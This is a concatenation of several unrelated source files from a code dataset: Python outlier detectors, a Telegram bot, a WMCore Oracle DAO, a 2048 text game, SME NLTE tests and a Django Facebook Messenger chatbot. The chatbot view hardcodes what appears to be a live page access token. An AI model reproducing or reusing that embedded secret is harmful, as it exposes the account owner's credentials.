OneDimArray:\n return self._gmm.weights_\n\n def __init__(\n self,\n contamination: float = 0.01,\n verbose: bool = False,\n gmm_params: dict = None\n ) -> None:\n super().__init__(contamination=contamination, verbose=verbose)\n\n self.gmm_params = gmm_params\n\n def check_params(self, X: TwoDimArray, y: OneDimArray = None) -> None:\n \"\"\"Check validity of parameters and raise ValueError if not valid.\"\"\"\n\n super().check_params(X)\n\n @timeit\n def fit(self, X: TwoDimArray, y: OneDimArray = None) -> 'GMM':\n \"\"\"Fit the model according to the given training data.\n\n Parameters\n ----------\n X : array-like of shape (n_samples, n_features)\n Training data.\n\n y : ignored\n\n Returns\n -------\n self : GMM\n Return self.\n \"\"\"\n\n self.check_params(X)\n\n self.X_ = check_array(X)\n\n if self.gmm_params is None:\n gmm_params = {}\n else:\n gmm_params = self.gmm_params\n\n self._gmm = GaussianMixture(**gmm_params).fit(X)\n\n self.threshold_ = np.percentile(\n self.anomaly_score(), 100. * (1. - self.contamination)\n )\n\n return self\n\n def anomaly_score(self, X: TwoDimArray = None) -> OneDimArray:\n \"\"\"Compute the anomaly score for each sample.\n\n Parameters\n ----------\n X : array-like of shape (n_samples, n_features), default None\n Data. If not provided, the anomaly score for each training sample\n is returned.\n\n Returns\n -------\n anomaly_score : array-like of shape (n_samples,)\n Anomaly score for each sample.\n \"\"\"\n\n check_is_fitted(self, '_gmm')\n\n if X is None:\n X = self.X_\n\n return -self._gmm.score_samples(X)\n\n def score(self, X: TwoDimArray, y: OneDimArray = None) -> float:\n \"\"\"Compute the mean log-likelihood of the given data.\n\n Parameters\n ----------\n X : array-like of shape (n_samples, n_features)\n Data.\n\n y : ignored.\n\n Returns\n -------\n score : float\n Mean log-likelihood of the given data.\n \"\"\"\n\n check_is_fitted(self, '_gmm')\n\n return self._gmm.score(X)\n\n\nclass KDE(BaseDetector):\n \"\"\"Outlier detector using Kernel Density Estimation (KDE).\n\n Parameters\n ----------\n contamination : float, default 0.01\n Amount of contamination of the data set, i.e. the proportion of\n outliers in the data set. Used to define the threshold.\n\n verbose : bool, default False\n Enable verbose output.\n\n kde_params : dict, default None\n Other keywords passed to sklearn.neighbors.KernelDensity().\n\n Attributes\n ----------\n threshold_ : float\n Threshold.\n\n X_ : array-like of shape (n_samples, n_features)\n Training data.\n \"\"\"\n\n @property\n def X_(self) -> TwoDimArray:\n return self._kde.tree_.data\n\n def __init__(\n self,\n contamination: float = 0.01,\n verbose: bool = False,\n kde_params: dict = None\n ) -> None:\n super().__init__(contamination=contamination, verbose=verbose)\n\n self.kde_params = kde_params\n\n def check_params(self, X: TwoDimArray, y: OneDimArray = None) -> None:\n \"\"\"Check validity of parameters and raise ValueError if not valid.\"\"\"\n\n super().check_params(X)\n\n @timeit\n def fit(self, X: TwoDimArray, y: OneDimArray = None) -> 'KDE':\n \"\"\"Fit the model according to the given training data.\n\n Parameters\n ----------\n X : array-like of shape (n_samples, n_features)\n Training data.\n\n y : ignored\n\n Returns\n -------\n self : KDE\n Return self.\n \"\"\"\n\n self.check_params(X)\n\n if self.kde_params is None:\n kde_params = {}\n else:\n kde_params = self.kde_params\n\n self._kde = KernelDensity(**kde_params).fit(X)\n\n self.threshold_ = np.percentile(\n self.anomaly_score(), 100. * (1. - self.contamination)\n )\n\n return self\n\n def anomaly_score(self, X: TwoDimArray = None) -> OneDimArray:\n \"\"\"Compute the anomaly score for each sample.\n\n Parameters\n ----------\n X : array-like of shape (n_samples, n_features), default None\n Data. If not provided, the anomaly score for each training sample\n is returned.\n\n Returns\n -------\n anomaly_score : array-like of shape (n_samples,)\n Anomaly score for each sample.\n \"\"\"\n\n check_is_fitted(self, '_kde')\n\n if X is None:\n X = self.X_\n\n return -self._kde.score_samples(X)\n\n def score(self, X: TwoDimArray, y: OneDimArray = None) -> float:\n \"\"\"Compute the mean log-likelihood of the given data.\n\n Parameters\n ----------\n X : array-like of shape (n_samples, n_features)\n Data.\n\n y : ignored\n\n Returns\n -------\n score : float\n Mean log-likelihood of the given data.\n \"\"\"\n\n check_is_fitted(self, '_kde')\n\n return np.mean(self._kde.score_samples(X))\n\n\nclass SparseStructureLearning(BaseDetector):\n \"\"\"Outlier detector using sparse structure learning.\n\n Parameters\n ----------\n contamination : float, default 0.01\n Amount of contamination of the data set, i.e. the proportion of\n outliers in the data set. Used to define the threshold.\n\n verbose : bool, default False\n Enable verbose output.\n\n apcluster_params : dict, default None\n Other keywords passed to sklearn.cluster.affinity_propagation().\n\n glasso_params : dict, default None\n Other keywords passed to sklearn.covariance.GraphLasso().\n\n Attributes\n ----------\n covariance_ : array-like of shape (n_features, n_features)\n Estimated covariance matrix.\n\n labels_ : array-like of shape (n_features,)\n Label of each feature.\n\n location_ : array-like of shape (n_features,)\n Estimated location.\n\n n_iter_ : int\n Number of iterations run.\n\n partial_corrcoef_ : array-like of shape (n_features, n_features)\n Partial correlation coefficient matrix.\n\n precision_ : array-like of shape (n_features, n_features)\n Estimated pseudo inverse matrix.\n\n threshold_ : float\n Threshold.\n\n X_ : array-like of shape (n_samples, n_features)\n Training data.\n\n References\n ----------\n T. Ide, C. Lozano, N. Abe and Y. Liu,\n \"Proximity-based anomaly detection using sparse structure learning,\"\n In Proceedings of SDM'09, pp. 97-108, 2009.\n \"\"\"\n\n @property\n def covariance_(self) -> TwoDimArray:\n return self._glasso.covariance_\n\n @property\n def labels_(self) -> OneDimArray:\n if self.apcluster_params is None:\n apcluster_params = {}\n else:\n apcluster_params = self.apcluster_params\n\n # cluster using affinity propagation\n _, labels = affinity_propagation(\n self.partial_corrcoef_, **apcluster_params\n )\n\n return labels\n\n @property\n def location_(self) -> OneDimArray:\n return self._glasso.location_\n\n @property\n def n_iter_(self) -> int:\n return self._glasso.n_iter_\n\n @property\n def partial_corrcoef_(self) -> TwoDimArray:\n n_features, _ = self.precision_.shape\n diag = np.diag(self.precision_)[np.newaxis]\n partial_corrcoef = - self.precision_ / np.sqrt(diag.T @ diag)\n partial_corrcoef.flat[::n_features + 1] = 1.\n\n return partial_corrcoef\n\n @property\n def precision_(self) -> TwoDimArray:\n return self._glasso.precision_\n\n def __init__(\n self,\n contamination: float = 0.01,\n verbose: bool = False,\n apcluster_params: dict = None,\n glasso_params: dict = None\n ) -> None:\n super().__init__(contamination=contamination, verbose=verbose)\n\n self.apcluster_params = apcluster_params\n self.glasso_params = glasso_params\n\n def check_params(self, X: TwoDimArray, y: OneDimArray = None) -> None:\n \"\"\"Check validity of parameters and raise ValueError if not valid.\"\"\"\n\n super().check_params(X)\n\n @timeit\n def fit(\n self,\n X: TwoDimArray,\n y: OneDimArray = None\n ) -> 'SparseStructureLearning':\n \"\"\"Fit the model according to the given training data.\n\n Parameters\n ----------\n X : array-like of shape (n_samples, n_features)\n Training Data.\n\n y : ignored\n\n Returns\n -------\n self : SparseStructureLearning\n Return self.\n \"\"\"\n\n self.check_params(X)\n\n self.X_ = check_array(X)\n\n if self.glasso_params is None:\n glasso_params = {}\n else:\n glasso_params = self.glasso_params\n\n self._glasso = GraphLasso(**glasso_params).fit(X)\n\n df, loc, scale = sp.stats.chi2.fit(self.anomaly_score())\n self.threshold_ = sp.stats.chi2.ppf(\n 1.0 - self.contamination, df, loc, scale\n )\n\n return self\n\n def anomaly_score(self, X: TwoDimArray = None) -> OneDimArray:\n \"\"\"Compute thre anomaly score for each sample.\n\n Parameters\n ----------\n X : array-like of shape (n_samples, n_features), default None\n Data. If not provided, the anomaly score for each training sample\n is returned.\n\n Returns\n -------\n anomaly_score : array-like of shape (n_samples,)\n Anomaly score for each sample.\n \"\"\"\n\n check_is_fitted(self, '_glasso')\n\n if X is None:\n X = self.X_\n else:\n X = check_array(X)\n\n return self._glasso.mahalanobis(X)\n\n def featurewise_anomaly_score(self, X: TwoDimArray = None) -> TwoDimArray:\n \"\"\"Compute the feature-wise anomaly scores for each sample.\n\n Parameters\n ----------\n X : array-like of shape (n_samples, n_features), default None\n Data. If not provided, the feature-wise anomaly scores for each\n training sample are returned.\n\n Returns\n -------\n anomaly_score : array-like of shape (n_samples, n_features)\n Feature-wise anomaly scores for each sample.\n \"\"\"\n\n check_is_fitted(self, '_glasso')\n\n if X is None:\n X = self.X_\n\n return 0.5 * np.log(\n 2. * np.pi / np.diag(self.precision_)\n ) + 0.5 / np.diag(\n self.precision_\n ) * ((X - self.location_) @ self.precision_) ** 2\n\n def score(self, X: TwoDimArray, y: OneDimArray = None) -> float:\n \"\"\"Compute the mean log-likelihood of the given data.\n\n Parameters\n ----------\n X : array-like of shape (n_samples, n_features)\n Data.\n\n y : ignored\n\n Returns\n -------\n score : float\n Mean log-likelihood of the given data.\n \"\"\"\n\n check_is_fitted(self, '_glasso')\n\n return self._glasso.score(X)\n\n def plot_graphical_model(self, **kwargs) -> Axes:\n \"\"\"Plot the Gaussian Graphical Model (GGM).\n\n Parameters\n ----------\n ax : matplotlib Axes, default None\n Target axes instance.\n\n title : string, default 'Graphical model'\n Axes title. To disable, pass None.\n\n filepath : str, default None\n If not None, save the current figure.\n\n **kwargs : dict\n Other keywords passed to nx.draw_networkx().\n\n Returns\n -------\n ax : matplotlib Axes\n Axes on which the plot was drawn.\n \"\"\"\n\n kwargs['node_color'] = self.labels_\n\n return plot_graphical_model(self.partial_corrcoef_, **kwargs)\n\n def plot_partial_corrcoef(self, **kwargs) -> Axes:\n \"\"\"Plot the partial correlation coefficient matrix.\n\n Parameters\n ----------\n ax : matplotlib Axes, default None\n Target axes instance.\n\n cmap : matplotlib Colormap, default None\n If None, plt.cm.RdYlBu is used.\n\n vmin : float, default -1.0\n Used in conjunction with norm to normalize luminance data.\n\n vmax : float, default 1.0\n Used in conjunction with norm to normalize luminance data.\n\n cbar : bool, default True.\n Whether to draw a colorbar.\n\n title : string, default 'Partial correlation'\n Axes title. To disable, pass None.\n\n filepath : str, default None\n If not None, save the current figure.\n\n **kwargs : dict\n Other keywords passed to ax.imshow().\n\n Returns\n -------\n ax : matplotlib Axes\n Axes on which the plot was drawn.\n \"\"\"\n\n return plot_partial_corrcoef(self.partial_corrcoef_, **kwargs)\n","sub_path":"kenchi/outlier_detection/statistical.py","file_name":"statistical.py","file_ext":"py","file_size_in_byte":15688,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"279952364","text":"import locale\nimport logging\n\nimport command\nfrom redacted import BOT_TOKEN\n\n\nfrom telegram.ext import Updater, InlineQueryHandler, CommandHandler\n\n\nlogging.basicConfig(format='%(asctime)s - %(name)s - %(levelname)s - %(message)s',\n level=logging.INFO)\n\nlogger = logging.getLogger(__name__)\n\ntry:\n locale.setlocale(locale.LC_TIME, \"nl_NL.utf8\")\nexcept locale.Error:\n locale.setlocale(locale.LC_TIME, \"nl_NL\")\n\n\n\ndef error(update, context):\n \"\"\"Log Errors caused by Updates.\"\"\"\n logger.warning('Update \"%s\" caused error \"%s\"', update, context.error)\n\n\ndef main():\n \"\"\"Start the bot.\"\"\"\n # Create the Updater and pass it your bot's token.\n # Make sure to set use_context=True to use the new context based callbacks\n # Post version 12 this will no longer be necessary\n updater = Updater(BOT_TOKEN, use_context=True)\n\n # Get the dispatcher to register handlers\n dp = updater.dispatcher\n\n # on different commands - answer in Telegram\n [dp.add_handler(CommandHandler(value, key)) for value, key in command.commands.items()]\n dp.add_handler(CommandHandler(\"help\", command.start))\n\n # # on noncommand i.e message - echo the message on Telegram\n # dp.add_handler(MessageHandler(Filters.text, noncommand.echo))\n dp.add_handler(InlineQueryHandler(command.inlinequery))\n\n # log all errors\n dp.add_error_handler(error)\n\n # Start the Bot\n print(\"Listening...\")\n updater.start_polling()\n updater.idle()\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":1516,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"409342403","text":"#!/usr/bin/env python\n\"\"\"\n_New_\n\nOracle implementation of Masks.New\n\"\"\"\n\nimport logging\n\nfrom WMCore.WMBS.MySQL.Masks.New import New as NewMasksMySQL\n\n__all__ = []\n\n\nclass New(NewMasksMySQL):\n sql = NewMasksMySQL.sql\n\n def getDictBinds(self, jobList, inclusivemask=True):\n binds = []\n for job in jobList:\n if inclusivemask:\n mask = 'Y'\n else:\n mask = 'N'\n binds.append({'jobid': job['id'], 'inclusivemask': mask,\n 'firstevent': job['mask']['FirstEvent'],\n 'lastevent': job['mask']['LastEvent'],\n 'firstrun': job['mask']['FirstRun'],\n 'lastrun': job['mask']['LastRun'],\n 'firstlumi': job['mask']['FirstLumi'],\n 'lastlumi': job['mask']['LastLumi'], })\n\n return binds\n\n def execute(self, jobid=None, inclusivemask=None, conn=None,\n transaction=False, jobList=None):\n\n if jobList:\n binds = self.getDictBinds(jobList, inclusivemask)\n result = self.dbi.processData(self.sql, binds, conn=conn, transaction=transaction)\n return self.format(result)\n\n elif jobid:\n if inclusivemask == None:\n binds = self.getBinds(jobid=jobid, inclusivemask='Y')\n else:\n binds = self.getBinds(jobid=jobid, inclusivemask='N')\n\n result = self.dbi.processData(self.plainsql, binds, conn=conn,\n transaction=transaction)\n return self.format(result)\n\n else:\n logging.error('Masks.New asked to create Mask with no Job ID')\n return\n","sub_path":"src/python/WMCore/WMBS/Oracle/Masks/New.py","file_name":"New.py","file_ext":"py","file_size_in_byte":1746,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"322037202","text":"#\n# ISEL - LEIM - MDP - 2014/2015 - 1o Semestre\n#\n# Jogo 2048 em modo de texto\n#\n# Autor: João Beleza Sousa & Andre Carvalho no: 41839\n#\n# História:\n#\n# 2015/02/09 - Implementacao de uma grelha 5x5\n#\n# 2015/01/07 - Implementacao das funcao \"debug\"\n#\n# 2014/11/28 - Acrescentado o uso do gestor. (aula 07 - jbs)\n#\n# 2014/11/19 - Acrescentado o output dos pontos. (aula 06 - jbs)\n#\n# 2014/11/12 - Acrescentada a tecla ’a’ com chamada à função esquerda.\n# (aula 05 - jbs)\n#\n# 2014/11/12 - Corrigido erro na função print_grelha. Os números das linhas e\n# das colunas estavam a começar em zero. Segundo a especificação\n# começam em 1.\n# (aula 05 - Daniel Silveira Gomes n. 41599)\n\n\nfrom j2048_motor_41839 import novo_jogo\nfrom j2048_motor_41839 import valor\nfrom j2048_motor_41839 import terminou\nfrom j2048_motor_41839 import esquerda\nfrom j2048_motor_41839 import pontuacao\nfrom j2048_motor_41839 import direita\nfrom j2048_motor_41839 import acima\nfrom j2048_motor_41839 import abaixo\n\n# aula 07\nfrom j2048_gestor_41839 import inicializa_semente\nfrom j2048_gestor_41839 import le_identificacao\nfrom j2048_gestor_41839 import regista_grelha\nfrom j2048_gestor_41839 import regista_jogada\nfrom j2048_gestor_41839 import regista_pontos\nfrom j2048_gestor_41839 import escreve_registo\n\n\n#Debug\nsemente_favorita = 344\n\nprint(\"jogo 2048\")\nprint(\"use as letras wasd\")\nprint(\"boa sorte!\")\n\ndef debug():\n jogadas_1='=ddssswswsswdsdasssdsdwwaawdaasasssdawwdasasasddaawsaadwdswdswswdwdawdsswadwssdwsswwadwsdwswsawadddsawsadaddwdwwaasddddwdswwadswswsddwwdwdsdwdwswsawsdaadsdddwdwdswwwd'\n #Transforma a string anterior numa lista\n a_1 = list(jogadas_1)\n \n for i in range(len(list(jogadas_1))):\n if a_1[i] == 'w':\n print(\"MOVIMENTO:CIMA\")\n acima()\n \n if a_1[i] == 's':\n print(\"MOVIMENTO:BAIXO\")\n abaixo()\n \n if a_1[i] == 'a':\n print(\"MOVIMENTO:ESQUERDA\")\n esquerda()\n \n if a_1[i] == 'd':\n print(\"MOVIMENTO:DIREITA\")\n direita()\n \ndef ocupar_5_espacos(um_numero):\n\n resultado = str(um_numero)\n acrescentar = 5 - len(resultado)\n\n if acrescentar > 0:\n for n in range(acrescentar):\n resultado = resultado + \" \"\n\n return(resultado)\n\ndef print_grelha():\n\n print(\"pontos = \" + str(pontuacao())) # aula 06\n\n for linha in[0, 1, 2, 3, 4]:\n linha_string = \"\"\n for coluna in [0, 1, 2, 3, 4]:\n linha_string = linha_string \\\n + ocupar_5_espacos(valor(linha + 1, coluna + 1)) + \" \"\n print(linha_string)\n\ninicializa_semente(semente_favorita) # aula 07\nnovo_jogo()\nprint_grelha()\n\nle_identificacao() # aula 07\nregista_grelha(valor(1,1), valor(1,2), valor(1,3), valor(1,4), valor(1,5),\n valor(2,1), valor(2,2), valor(2,3), valor(2,4), valor(2,5),\n valor(3,1), valor(3,2), valor(3,3), valor(3,4), valor(3,5),\n valor(4,1), valor(4,2), valor(4,3), valor(4,4), valor(4,5),\n valor(5,1), valor(5,2), valor(5,3), valor(5,4), valor(5,5)) # aula 07\nletra = None\n\nwhile letra != 'q'and not(terminou()):\n\n letra = input()\n\n if letra == 'n':\n regista_pontos(pontuacao()) # aula 07\n escreve_registo() # aula 07\n inicializa_semente(semente_favorita) # aula 07\n novo_jogo()\n regista_grelha(valor(1,1), valor(1,2), valor(1,3), valor(1,4), valor(1,5),\n valor(2,1), valor(2,2), valor(2,3), valor(2,4), valor(2,5),\n valor(3,1), valor(3,2), valor(3,3), valor(3,4), valor(3,5),\n valor(4,1), valor(4,2), valor(4,3), valor(4,4), valor(4,5),\n valor(5,1), valor(5,2), valor(5,3), valor(5,4), valor(5,5)) # aula 07\n elif letra == 'a':\n esquerda()\n regista_jogada(letra) # aula 07\n elif letra == 'd':\n direita()\n regista_jogada(letra) # aula 07\n elif letra == 'w':\n acima()\n regista_jogada(letra) # aula 07\n elif letra == 's':\n abaixo()\n regista_jogada(letra) # aula 07\n elif letra == 'g':\n debug()\n\n print_grelha()\n\nregista_pontos(pontuacao()) # aula 07\nescreve_registo() # aula 07\nprint(\"Fim\")\n","sub_path":"j2048_modo_texto_41839.py","file_name":"j2048_modo_texto_41839.py","file_ext":"py","file_size_in_byte":4263,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"234658617","text":"# TODO implement NLTE tests\n\nimport pytest\n\nfrom os.path import dirname\n\nimport numpy as np\n\nfrom sme.sme import SME_Struct\nfrom sme.iliffe_vector import Iliffe_vector\nfrom sme.vald import ValdFile\nfrom sme.sme_synth import SME_DLL\nfrom sme.nlte import nlte\nfrom sme.solve import get_atmosphere, synthesize_spectrum\n\nfrom sme.config import Config\nfrom sme.large_file_storage import LargeFileStorage\n\ncwd = dirname(__file__)\n\n\n@pytest.fixture\ndef lfs_nlte():\n config = Config()\n server = config[\"data.file_server\"]\n storage = config[\"data.nlte_grids\"]\n cache = config[\"data.cache.nlte_grids\"]\n pointers = config[\"data.pointers.nlte_grids\"]\n lfs_nlte = LargeFileStorage(server, pointers, storage, cache)\n return lfs_nlte\n\n\ndef make_minimum_structure():\n sme = SME_Struct()\n sme.teff = 5000\n sme.logg = 4.4\n sme.vmic = 1\n sme.vmac = 1\n sme.vsini = 1\n sme.set_abund(0, \"asplund2009\", \"\")\n sme.linelist = ValdFile(f\"{cwd}/testcase3.lin\").linelist\n sme.atmo.source = \"marcs2012p_t2.0.sav\"\n sme.atmo.method = \"grid\"\n\n sme.wran = [[6436, 6444]]\n\n return sme\n\n\ndef test_activate_nlte():\n sme = make_minimum_structure()\n\n # Make sure nothing is set yet\n assert len(sme.nlte.elements) == 0\n\n # Add an element\n sme.nlte.set_nlte(\"Ca\")\n assert len(sme.nlte.elements) == 1\n assert \"Ca\" in sme.nlte.elements\n\n # Add it again, shouldn't change anything\n sme.nlte.set_nlte(\"Ca\")\n assert len(sme.nlte.elements) == 1\n assert \"Ca\" in sme.nlte.elements\n\n # Try to remove something else\n sme.nlte.remove_nlte(\"Na\")\n assert len(sme.nlte.elements) == 1\n assert \"Ca\" in sme.nlte.elements\n\n # Remove the original element\n sme.nlte.remove_nlte(\"Ca\")\n assert len(sme.nlte.elements) == 0\n\n # Add a element with a custom grid\n sme.nlte.set_nlte(\"Na\", \"test_grid.grd\")\n assert len(sme.nlte.elements) == 1\n assert \"Na\" in sme.nlte.elements\n assert sme.nlte.grids[\"Na\"] == \"test_grid.grd\"\n\n # Update custom grid\n sme.nlte.set_nlte(\"Na\", \"test_grid2.grd\")\n assert len(sme.nlte.elements) == 1\n assert sme.nlte.grids[\"Na\"] == \"test_grid2.grd\"\n\n # Add element without default grid\n with pytest.raises(ValueError):\n sme.nlte.set_nlte(\"U\")\n\n # with a grid it should work\n sme.nlte.set_nlte(\"U\", \"test_grid.grd\")\n assert sme.nlte.grids[\"U\"] == \"test_grid.grd\"\n\n\ndef test_run_with_nlte():\n # NOTE sme structure must have long format for NLTE\n sme = make_minimum_structure()\n sme.nlte.set_nlte(\"Ca\")\n\n sme2 = synthesize_spectrum(sme)\n\n assert isinstance(sme2.nlte.flags, np.ndarray)\n assert np.issubdtype(sme2.nlte.flags.dtype, np.dtype(\"bool\"))\n assert len(sme2.nlte.flags) == len(sme2.linelist)\n assert np.any(sme2.nlte.flags)\n\n\ndef test_dll(lfs_nlte):\n sme = make_minimum_structure()\n elem = \"Ca\"\n sme.nlte.set_nlte(elem)\n\n libsme = SME_DLL()\n libsme.ResetNLTE()\n\n sme = get_atmosphere(sme, lfs_nlte)\n libsme.InputLineList(sme.linelist)\n libsme.InputModel(sme.teff, sme.logg, sme.vmic, sme.atmo)\n\n # This is essentially what update_depcoefs does, just for one element\n counter = 0\n bmat, linerefs, lineindices = nlte(sme, libsme, elem, lfs_nlte)\n for lr, li in zip(linerefs, lineindices):\n if lr[0] != -1 and lr[1] != -1:\n counter += 1\n libsme.InputNLTE(bmat[:, lr].T, li)\n\n flags = libsme.GetNLTEflags()\n assert np.any(flags)\n assert np.count_nonzero(flags) == counter\n assert len(flags) == len(sme.linelist)\n\n idx = np.where(flags)[0][0]\n coeffs = libsme.GetNLTE(idx)\n assert coeffs is not None\n\n # If we reset NLTE no flags should be set\n libsme.ResetNLTE()\n flags = libsme.GetNLTEflags()\n assert not np.any(flags)\n assert len(flags) == len(sme.linelist)\n\n with pytest.raises(TypeError):\n libsme.InputNLTE(None, 0)\n\n with pytest.raises(TypeError):\n libsme.InputNLTE(bmat[:, [0, 1]].T, 0.1)\n\n with pytest.raises(ValueError):\n libsme.InputNLTE([0, 1], 10)\n\n with pytest.raises(ValueError):\n libsme.InputNLTE(bmat[:, [0, 1]].T, -10)\n\n","sub_path":"test/test_nlte.py","file_name":"test_nlte.py","file_ext":"py","file_size_in_byte":4120,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"233000880","text":"# yomamabot/fb_yomamabot/views.py\r\nimport json, requests, random, re\r\nfrom pprint import pprint\r\nimport os\r\n\r\nfrom django.views import generic\r\nfrom django.http.response import HttpResponse\r\n\r\nfrom django.views.decorators.csrf import csrf_exempt\r\nfrom django.utils.decorators import method_decorator\r\n\r\nfrom chatterbot import ChatBot\r\nfrom chatterbot.trainers import ChatterBotCorpusTrainer\r\nfrom hanziconv import HanziConv\r\nfrom django.conf import settings\r\nfrom fb_Chatbot.googlemap.mapAPI import G_center, G_zoom, request87\r\n# ------------------------ Fill this with your page access token! -------------------------------\r\nPAGE_ACCESS_TOKEN = \"EAAEQtzvtPZCYBALeH5PVSZA8EZBgkoOmvDZCXY1ft7S7jZB3hOeEnOzNAFkYtYgVtFxXtqwjVphpcZAXFTyXaBlzp739myROFJpGS6b4SoHiUn4UAoWbUK79bqy5MoWjxpCgf6UHRtj6ZB0Y1aO6jZC6ZBiBkUZA4B0yUROJEqLVWaVQZDZD\"\r\nVERIFY_TOKEN = \"20171013\" \r\nlist1 = ['地址','位置','哪','去']\r\nlisttoolong = ['你','我','他','想','的','要']\r\nlisttoolong_find = 0\r\nlistlocation_find =0\r\n\r\n# def Profile_facebook_message(fbid):\r\n# user_details_url = \"https://graph.facebook.com/v2.6/%s\"%fbid \r\n# user_details_params = {'fields':'first_name,last_name,profile_pic', 'access_token':PAGE_ACCESS_TOKEN} \r\n# user_details = requests.get(user_details_url, user_details_params).json() \r\n# profile_message_url=\"https://graph.facebook.com/v2.6/me/messenger_profile?access_token=%s\"%PAGE_ACCESS_TOKEN\r\n# getstart_msg = json.dumps({\r\n# \"get_started\":{\r\n# \"payload\":\"\"\r\n# },\r\n# \"message\":{\"text\":\"hellow\"}\r\n# })\r\n# status = requests.post(profile_message_url, headers={\"Content-Type\": \"application/json\"},data=getstart_msg)\r\n\r\ndef post_facebook_image(fbid):\r\n G_center\r\n post_message_url = 'https://graph.facebook.com/v2.6/me/messages?access_token=%s'%PAGE_ACCESS_TOKEN\r\n response_msg = json.dumps({\r\n \"recipient\":{\"id\":fbid},\r\n \"message\":{\r\n \"attachment\":{\r\n \"type\":\"image\",\"payload\":{\"url\":request87}}}})\r\n status = requests.post(post_message_url, headers={\"Content-Type\": \"application/json\"},data=response_msg)\r\n # pprint(status.json())\r\n# Helper function\r\ndef post_facebook_message(fbid, recevied_message):\r\n jerry = ChatBot(\"jerry\",storage_adapter=\"chatterbot.storage.SQLStorageAdapter\",database=os.path.join(settings.BASE_DIR,'fb_Chatbot/chat/test'))\r\n jerry.set_trainer(ChatterBotCorpusTrainer)\r\n jerry.train(\"C:\\\\Users\\\\MA303\\Desktop\\\\Chatbot\\\\fb_Chatbot\\\\chat\\\\jerry_DB.json\") \r\n # C:\\Users\\MA303\\Desktop\\Chatbot\\fb_Chatbot\\chat\r\n tokens = re.sub(r\"[^a-zA-Z0-9\\s]\",' ',recevied_message).lower().split()\r\n joke_text = ''\r\n # print (recevied_message)\r\n # print (type (recevied_message))\r\n # print (tokens)\r\n # print (type (tokens))\r\n y = jerry.get_response(recevied_message)\r\n y = HanziConv.toTraditional(y.text)\r\n print(y)\r\n joke_text = y\r\n user_details_url = \"https://graph.facebook.com/v2.6/%s\"%fbid \r\n user_details_params = {'fields':'first_name,last_name,profile_pic', 'access_token':PAGE_ACCESS_TOKEN} \r\n user_details = requests.get(user_details_url, user_details_params).json() \r\n joke_text = 'Yo ..! ' + joke_text\r\n post_message_url = 'https://graph.facebook.com/v2.6/me/messages?access_token=%s'%PAGE_ACCESS_TOKEN\r\n global listlocation_find\r\n global listtoolong_find\r\n global list1\r\n global listtoolong\r\n for i in range(4):\r\n print (listlocation_find)\r\n listlocation_find = recevied_message.find(list1[i])\r\n print(\"after==\")\r\n print (listlocation_find)\r\n if listlocation_find >= 0 :\r\n for r in range(5):\r\n listtoolong_find = recevied_message.find(listtoolong[r])\r\n if listtoolong_find >= 0:\r\n l = listtoolong_find +1\r\n recevied_message = recevied_message[:listtoolong_find] + recevied_message[l:]\r\n print(recevied_message)\r\n response_msg = json.dumps({\"recipient\":{\"id\":fbid},\"message\":{\"text\":\"https://www.google.com.tw/maps/search/\"+recevied_message,}})\r\n status = requests.post(post_message_url, headers={\"Content-Type\": \"application/json\"},data=response_msg)\r\n pprint(status.json())\r\n if recevied_message==\"查詢google圖片\":\r\n response_msg = json.dumps({\"recipient\":{\"id\":fbid},\"message\":{\"text\":\"以下是您搜尋的地點\"}})\r\n status = requests.post(post_message_url, headers={\"Content-Type\": \"application/json\"},data=response_msg)\r\n post_facebook_image(fbid)\r\n if recevied_message == \"旅遊\" :\r\n response_msg = json.dumps({\"recipient\":{\"id\":fbid},\"message\":{\r\n \"text\":\"旅遊選擇如下\",\r\n \"quick_replies\":[\r\n {\r\n \"content_type\":\"text\",\r\n \"title\":\"台北\",\r\n \"payload\":\"\"\r\n },\r\n {\r\n \"content_type\":\"text\",\r\n \"title\":\"宜蘭\",\r\n \"payload\":\"\"\r\n },\r\n {\r\n \"content_type\":\"location\"\r\n }\r\n \r\n ]}})\r\n status = requests.post(post_message_url, headers={\"Content-Type\": \"application/json\"},data=response_msg)\r\n pprint(status.json())\r\n else :\r\n response_msg = json.dumps({\"recipient\":{\"id\":fbid}, \"message\":{\r\n \"text\":joke_text,}})\r\n status = requests.post(post_message_url, headers={\"Content-Type\": \"application/json\"},data=response_msg)\r\n pprint(status.json())\r\n\r\n# Create your views here.\r\nclass ChatbotView(generic.View):\r\n def get(self, request, *args, **kwargs):\r\n if self.request.GET['hub.verify_token'] == VERIFY_TOKEN:\r\n return HttpResponse(self.request.GET['hub.challenge'])\r\n else:\r\n return HttpResponse('Error, invalid token')\r\n \r\n @method_decorator(csrf_exempt)\r\n def dispatch(self, request, *args, **kwargs):\r\n return generic.View.dispatch(self, request, *args, **kwargs)\r\n\r\n # Post function to handle Facebook messages\r\n def post(self, request, *args, **kwargs):\r\n # Converts the text payload into a python dictionary\r\n incoming_message = json.loads(self.request.body.decode('utf-8'))\r\n # Facebook recommends going through every entry since they might send\r\n # multiple messages in a single call during high load\r\n # print(incoming_message)\r\n for entry in incoming_message['entry']:\r\n for message in entry['messaging']:\r\n # Check to make sure the received call is a message call\r\n # This might be delivery, optin, postback for other events \r\n if 'message' in message:\r\n # Print the message to the terminal\r\n # pprint(message) \r\n # Assuming the sender only sends text. Non-text messages like stickers, audio, pictures\r\n # are sent as attachments and must be handled accordingly. \r\n post_facebook_message(message['sender']['id'], message['message']['text'])\r\n\r\n return HttpResponse() \r\n\r\n ","sub_path":"1221 MessengerBot_Googlemap/chatbot/chatbot/Scripts/testbot0429/testbot0429/GooglemapBot/舊版views資料/views_圖片傳送完成版.py","file_name":"views_圖片傳送完成版.py","file_ext":"py","file_size_in_byte":7237,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"516451215","text":"import sys\ntry:\n if sys.argv[1]:\n meets = [(1,4),(3,5),(0,6),(5,7),(3,8),(5,9),(6,10),(8,11),(8,12),(2,13),(12,14)]\nexcept IndexError:\n n = input()\n meets = [tuple(map(int, raw_input().split())) for i in 